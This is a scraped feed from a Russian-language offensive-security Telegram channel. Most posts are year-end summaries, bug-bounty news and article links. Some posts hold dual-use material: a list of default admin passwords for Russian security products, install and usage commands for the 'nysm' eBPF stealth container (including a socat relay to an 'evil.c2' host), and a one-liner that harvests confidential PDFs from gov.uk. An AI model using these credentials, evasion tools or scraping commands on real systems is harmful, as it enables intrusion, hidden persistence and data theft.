Похек – Telegram
Похек
16.2K subscribers
2.08K photos
110 videos
243 files
3.05K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @PoxekAds_bot или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Forwarded from PRO:PENTEST
😈 ПРОЕКТНЫЕ КЕЙСЫ:

🔥 ОБХОД СИСТЕМЫ СКУД В БЦ - https://news.1rj.ru/str/pro_pentest/11
🔥 КРАЖА ПРОПУСКА - https://news.1rj.ru/str/pro_pentest/17
🔥 ВЗЛОМ БАНКА - https://news.1rj.ru/str/pro_pentest/19
🔥 ВЗЛОМ КИНОСТУДИИ - https://news.1rj.ru/str/pro_pentest/20
🔥 ФИЗИКА С ЗАДЕРЖАНИЕМ ФСБ - https://news.1rj.ru/str/pro_pentest/36
🔥 ПРОЕКТ НА МИЛЛИОН - https://news.1rj.ru/str/pro_pentest/39
🔥 ВЗЛОМ БАНКА 2 - https://news.1rj.ru/str/pro_pentest/75
🔥 ВЗЛОМ ОТЕЛЯ - https://news.1rj.ru/str/pro_pentest/88
🔥 ВЗЛОМ НА ВЫСОТЕ - https://news.1rj.ru/str/pro_pentest/112

🤔 СТАТЬИ:

💯 ВВЕДЕНИЕ В НЛП ЧАСТЬ 1 - https://news.1rj.ru/str/pro_pentest/13
💯 ВВЕДЕНИЕ В НЛП ЧАСТЬ 2 - https://news.1rj.ru/str/pro_pentest/16
💯 ШАТАЕМ WI-FI (КАРМАННАЯ ШПОРА) - https://news.1rj.ru/str/pro_pentest/64
💯 ФИЗИЧЕСКИЙ ПЕНТЕСТ - https://xakep.ru/2023/01/19/physical-pentest/#toc13
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1721
Forwarded from BI.ZONE Bug Bounty
🏆 No more tears, good vibes only: подводим итоги года

Мы думали-думали, что же такое особенное подарить нашей десятке лучших... А потом как придумали! На двух загадочных фото в посте — подсказка ;)

А это список самых крутых багхантеров на нашей платформе в 2023 году:

1️⃣r0hack
2️⃣al88nsk
3️⃣artebels
4️⃣kwel
5️⃣ub1k
6️⃣BlackFan
7️⃣hodiebee
8️⃣freeman
9️⃣sergeym
1️⃣0️⃣zero-0x00 
1️⃣1️⃣arkiix

Хотим сказать спасибо всем, кто упорно багхантил на платформе весь год и поддерживал нас. 

А всех из десятки от души поздравляем, в ближайшее время свяжемся и отправим подарки.

Stay tuned!

UPD
arkiix влетел в рейтинг уже после подведения итогов, так что наш топ-10 магией Деда Мороза превратился в топ-11. Так держать!
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10❤‍🔥1🎄11
E-mail Injection; Инъекции в почтовую функциональность веб-приложений

Порой разработчикам необходимо создавать формы – разделы для сбора информации от пользователей веб-приложения. Было придумано множество способов обработки и сбора ответов пользователей на формы. Выбор подходящего зависит от спектра условий: вида и предполагаемого объёма данных, допустимого объёма выделенного хранилища, желаемых характеристик доступа, ... ;

Так сложилось, что одним из вариантов решения упомянутой задачи является использование электронной почты. Электронная почта – комплексная технология, в работе которой задействован целый список компонентов.

👉 Сохраняй

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
12
GIGANEWS. Главные события 2023 года по версии «Хакера»

Год под­ходит к кон­цу, некото­рые уже начина­ют резать салаты, а зна­чит, приш­ло вре­мя огля­нуть­ся назад и вспом­нить самые важ­ные, инте­рес­ные и забав­ные события, которы­ми он нам запом­нится. По тра­диции мы сос­тавили для тебя под­борку наибо­лее ярких взло­мов, атак, уяз­вимос­тей, фей­лов и дру­гих событий ухо­дяще­го 2023 года. Будет инте­рес­но, пог­нали!

В статье подвели итоги по следующим аспектам:
- Атака года
- Уязвимость года
- Утечка года
- Исследование года
- Блокировка года
- Нарушитель приватности года
- Малварь года
- Хардверный взлом года
- Странность года
- Фейл года
- Хайп года

👉 Очень советую прочитать тем, кто особо не следил за ИБ новостями.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
103
Не ну вы поняли)

Новые программы для тех, кто не собирается отдыхать на новогодние праздники

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
21😎81
🌚 А вот и моя статистика подъехала. Практически миллион просмотров на постах за год. Великая цифра!!
В следующем году постарается сделать как минимум х1.5, а то и больше!!
А также +3.5к подписчиков на канале, то бишь канал за этот год вырос в более чем 2 раза. Всем спасибо, что вы были этот год со мной. Следующий год обещает быть ещё более взрывным!! 🪄🪄
Please open Telegram to view this post
VIEW IN TELEGRAM
25❤‍🔥8🔥43👏1
⚠️⚠️⚠️⚠️⚠️ Знаете что мне нравится? Аудитория канала :)

🌲 Наконец-то настали новогодние выходные. Кто-то вчера досдал проекты, кто-то планирует багхантить, пока остальные отдыхают. Я лично собираюсь так сильно отоспаться, насколько мне хватит сил. Что и вам рекомендую :D

🌚 Этот год вышел вполне успешым. Побывал мне кажется в 5 раз больше на конференциях, чем в прошлом году. Какие-то дали новых знакомых, какие-то помогли найти новую любимую работу, какие-то были душными и бесполезными (Газпром.тех я про тебя). Открытие 🏠 КиберДома было интересным событием второго полугодия 2023 года. Успешно выступал, как на тему ИБэшечка (фирменная преза), так и на тему Pivoting. За все выступления получал огромный фидбек от знакомых и ранее не знакомых людей, что было очень приятно 🙏 . Ну и конечно ребрендинг канала, который прошёл настолько успешно, насколько даже я не ожидал, если честно)

🌚 Но, но, но будущий год обещает быть ещё лучше 🌚
Новые партнёрства, постараюсь выступать почаще (если буду успевать готовить темы), прогрессивный рост канала, улучшение контента: постараюсь делать контент одновременно для начинающих ребят и для тех, кто уже разбираются.

🌚 Обязательно выпущу мерч Похек. Планируются как минимум стикерпаки и футболки. Пока проблемы с нахождением годных производителей. Если у вас есть опыт заказа, то напишите в ЛС, пожалуйста.

🌚 А ещё, кое что очень крутое готовим. Будет ... а вот узнаете в следующем году

👉Всем спасибо, дальше будет ещё интереснее!! Всех с наступающим Новым Годом ❤️

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
257🔥6🎄4❤‍🔥221
Похек pinned «⚠️⚠️⚠️⚠️⚠️ Знаете что мне нравится? Аудитория канала :) 🌲 Наконец-то настали новогодние выходные. Кто-то вчера досдал проекты, кто-то планирует багхантить, пока остальные отдыхают. Я лично собираюсь так сильно отоспаться, насколько мне хватит сил. Что и вам…»
Всех поздравляю с Новым Годом!!
🌲🌲🌲🌚🌚🌚💰💰🎁🎁
Please open Telegram to view this post
VIEW IN TELEGRAM
39🔥106🎄41
Forwarded from true_security
на пентестах бывают случаи когда компрометация происходит через средства обнаружения атак и средства защиты....далеко не все фильтруют сетевой доступ к компонентам СЗИ.
Так сказать, спасибо за дефолтные пароли:
- rvision soar/deception/etc... ssh root:pxtm0222; postgres rvision:pxtm0222

- maxpatrol VM: Administrator:P@ssw0rd

- maxpatrol siem: Administrator:P@ssw0rd; rabbitmq: siem:P@ssw0rd или mpx_siem:P@ssw0rd

- pt xdr: Administrator:P@ssw0rd

- pt nad: administrator:P0sitive или administrator:Administr@t0r

- security vision soar: postgres postgres:1q2w#E$R

- kuma (kaspersky siem): admin:mustB3Ch@ng3d!

Докидывайте дефолтные пароли сзи в комментах)
🔥122
🕶 Похек попал в ежегодный список топовых ИБ-каналов
Please open Telegram to view this post
VIEW IN TELEGRAM
38🔥13🎉8❤‍🔥1
А я в каком-то смысле тоже джун...

thx @wearetyomsmnv

#meme

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
28🐳4😎4
This media is not supported in your browser
VIEW IN TELEGRAM
🔴 nysm
Скрытый контейнер для постэксплуатации

#eBPF #offensive

С ростом популярности offensive инструментов, основанных на eBPF, начиная от кражи учетных данных и заканчивая руткитами, скрывающими свой собственный PID, авторам пришел в голову вопрос: Можно ли сделать eBPF невидимым в глазах админа? В результате они создали nysm, eBPF stealth контейнер, предназначенный для того, чтобы сделать инструменты атакующих незаметными для системных администраторов, не только скрывая eBPF, но и многое другое:
- bpftool
- bpflist-bpfcc
- ps
- top
- sockstat
- ss
- rkhunter
- chkrootkit
- lsof
- auditd
- и другое

Как это работает?
Поскольку eBPF не может перезаписывать возвращаемые значения или адреса ядра, наша цель - найти вызов самого низкого уровня, взаимодействующий с адресом пользовательского пространства, чтобы перезаписать его значение и скрыть нужные объекты. Чтобы отличить события nysm от других, все выполняется в отдельном пространстве имен PID.


Установка:
sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y; git clone https://github.com/eeriedusk/nysm; cd nysm; bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h; make


Использование:
Usage: nysm [OPTION...] COMMAND
Stealth eBPF container.

-d, --detach Run COMMAND in background
-r, --rm Self destruct after execution
-v, --verbose Produce verbose output
-h, --help Display this help
--usage Display a short usage message

# Примеры
./nysm bash
./nysm -r ssh user@domain
./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443


👉 https://github.com/eeriedusk/nysm

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
1233😎1
Forwarded from SHADOW:Group
📁 Массовый поиск конфиденциальных данных в PDF-файлах

Исследуя таргет часто попадается много pdf'ок, которые могут содержать конфиденциальные данные. Просматривать вручную все это очень долго, а потому можно попробовать автоматизировать этот процесс.

1️⃣ Используем gau для сбора конечных точек из wayback, urlscan и т.д.
2️⃣ Фильтруем конечные точки по расширению .pdf с помощью Grep.
3️⃣ Проверяем с httpx, что url живой и возвращает 200 ОК.
4️⃣ С помощью curl'а смотрим все живые pdf'ки.
5️⃣ Конвертируем PDF в текст. Для этого есть утилитка pdftotext, которая, как видно из названия, умеет переводить из pdf в текст. Устанавливается так:
sudo apt install poppler-utils

6️⃣ Используем Grep для некоторых чувствительных слов, таких как "internal use only" или "confidential" и т.д.

В результате чего получим такую команду:

for i in $(echo "gov.uk" | gau --subs --threads 16 | grep -E -o 'https?://[^[:space:]]+\.pdf' | httpx -silent -mc 200); do if curl -k -s $i | pdftotext -q - - | grep -Eaiq 'confidential|internal use only'; then echo $i | tee output.txt; fi; done


Эта команда сканирует веб-сайт "gov.uk" и его поддомены в поиске URL-ов с PDF-файлами. Затем она проверяет каждый PDF-файл на наличие строк "confidential" или "internal use only" и записывает эти URL-ы в файл "output.txt".

Вы можете включить свое творческое мышление и попытаться изменить этот скрипт по своему усмотрению. Например, используя katana вместо gau или проверяя наличие других чувствительных слов, используя другие расширения и т.д. Использование собственного творческого подхода даст вам максимальную отдачу!

#web #recon #leak
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2142
This media is not supported in your browser
VIEW IN TELEGRAM
🔵 Галопом по Европам: Легитимные процессы Windows на пальцах
#windows

Статья-памятка - быстро и понятно о легитимных процессах Windows: какой процесс за что отвечает, какие нормальные свойства имеют процессы, и заправка в виде небольшого количества краткой, но полезной информации.

Подойдет всем - и тем, кто боится страшных букв в Диспетчере задач, и тем, кому просто интересно, что за что отвечает, и для чего это все нужно.

Статья за авторством @exc3pt10n


⚡️ https://habr.com/en/articles/784960/

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥136❤‍🔥22
Top 10 web hacking techniques of 2023 - конкурс открыт
#portswigger

За последний год множество исследователей в области безопасности поделились своими ресерчами с сообществом в виде записей в блогах, презентаций и технических статей.

Однако из-за огромного объема хорошие статьи могут быть упущены из виду и быстро забыты. Поэтому с 2006 года сообщество ежегодно объединяется для отбора самых интересных работ.

Подача заявок:
Чтобы подать заявку, просто укажите ссылку на исследование и, по желанию, краткий комментарий, объясняющий, что нового в этой работе.

❤️ Подать заявку на номинацию


Ниже указал актуальный список статей, которые уже отобрали для оценки в номинацию:

- Ransacking your password reset tokens
mTLS: When certificate authentication is done wrong
- Smashing the state machine: the true potential of web race conditions
- Bypass firewalls with of-CORs and typo-squatting
- RCE via LDAP truncation on hg.mozilla.org
- Cookie Bugs - Smuggling & Injection
- OAuth 2.0 Redirect URI Validation Falls Short, Literally
- Prototype Pollution in Python - Abdulrah33m's Blog
- Pretalx Vulnerabilities: How to get accepted at every conference
- From Akamai to F5 to NTLM... with love.
- Сan I speak to your manager? hacking root EPP servers to take control of zones
- Blind CSS Exfiltration: exfiltrate unknown web pages
- Compromising F5 BIGIP with Request Smuggling
- Server-side prototype pollution: Black-box detection without the DoS
- Tricks for Reliable Split-Second DNS Rebinding in Chrome and Safari
- HTML Over the Wire
- SMTP Smuggling - Spoofing E-Mails Worldwide
- DOM-based race condition: racing in the browser for fun
- Metamask Snaps: Playing in the Sand
- CVE-2022-4908: SOP bypass in Chrome using Navigation API
- Code Vulnerabilities Put Proton Mails at Risk

Моё лично мнение, что список очень интересный и в нашем комьюнити могут найтись те специалисты, которые захотят или заинтересуются отправкой своих работ в эту номинацию.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
162
Forwarded from wr3dmast3r vs pentest
Многие оставляют недоработанными вектора атак с self-XSS или XSS, заблокированной CSP. Иногда стоит уделить достаточно внимания каждой такой находке и посмотреть на уязвимость с другой стороны 😈

В этой статье мы рассмотрим различные методы и техники, которые расширяют границы XSS-атак: эксплуатацию XSS через service-worker, self-XSS в один клик и другие сочетания уязвимостей 💎

https://telegra.ph/XSS-Advanced-Level-01-09
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥114😈22
Потратился на праздниках? Самое время начать багхантить!

Если кто не заметил, в конце года на Standoff появилось пять новых программ с выплатами до 1 млн рублей. И многие из них закроются уже в конце января.

🔜 Но если начать ломать прямо сейчас, есть все шансы получить максимальное баунти (а за некоторые криты дают даже ящик фирменного «Блэк Хета» от Standoff 365 в качестве приятного бонуса).
Please open Telegram to view this post
VIEW IN TELEGRAM
👏9